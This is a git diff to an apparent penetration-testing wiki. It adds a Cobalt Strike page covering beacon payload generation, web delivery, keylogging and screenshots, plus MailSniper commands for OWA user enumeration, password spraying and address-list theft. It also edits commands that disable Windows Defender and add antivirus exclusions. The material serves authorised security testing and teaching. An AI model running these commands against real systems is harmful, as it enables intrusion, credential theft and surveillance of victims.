diff --git a/SUMMARY.md b/SUMMARY.md index 7d4ceeb45..40971df76 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -639,6 +639,7 @@ * [Empire](backdoors/empire.md) * [Salseo](backdoors/salseo.md) * [ICMPsh](backdoors/icmpsh.md) +* [Cobalt Strike](c2/cobalt-strike.md) ## ✍ TODO diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md new file mode 100644 index 000000000..1e3c31040 --- /dev/null +++ b/c2/cobalt-strike.md @@ -0,0 +1,42 @@ +# Cobalt Strike + +### Listeners + +Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more + +### Generate & Host payloads + +#### Generate payloads in files + +Attacks -> Packages -> + +* **`HTMLApplication`** for HTA files +* **`MS Office Macro`** for an office document with a macro +* **`Windows Executable`** for a .exe, .dll orr service .exe +* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs) + +#### Generate & Host payloads + +A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python + +#### Host Payloads + +If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config. + +### Beacon Options + +```bash +# Execute local .NET binary +execute-assembly + + +# Screenshots +printscreen # Take a single screenshot via PrintScr method +screenshot # Take a single screenshot +screenwatch # Take periodic screenshots of desktop +## Go to View -> Screenshots to see them + +# keylogger +keylogger [pid] [x86|x64] +## View > Keystrokes to see the keys pressed +``` diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 1c4bc6c62..298a0fd89 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq ``` +{% hint style="warning" %} +You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names). + +However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames. +{% endhint %} + +#### **OWA (Outlook Web Access) Server** + +If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper): + +```bash +ipmo C:\Tools\MailSniper\MailSniper.ps1 +# Get info about the domain +Invoke-DomainHarvestOWA -ExchHostname [ip] +# Enumerate valid users from a list of potential usernames +Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt +# Password spraying +Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021 +# Get addresses list from the compromised mail +Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt +``` + ### Knowing one or several usernames Ok, so you know you have already a valid username but no passwords... Then try: diff --git a/windows-hardening/basic-powershell-for-pentesters/README.md b/windows-hardening/basic-powershell-for-pentesters/README.md index f3e4c750e..105233393 100644 --- a/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/windows-hardening/basic-powershell-for-pentesters/README.md @@ -176,16 +176,14 @@ Get-NetConnectionProfile | } ``` -## Disable Defender +## Antivirus ```bash -# Check status +#Check status Get-MpComputerStatus -# Disable +#Disable Set-MpPreference -DisableRealtimeMonitoring $true -#To completely disable Windows Defender on a computer, use the command: -New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force -# Set exclusion path +#Set exclusion path Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk" ```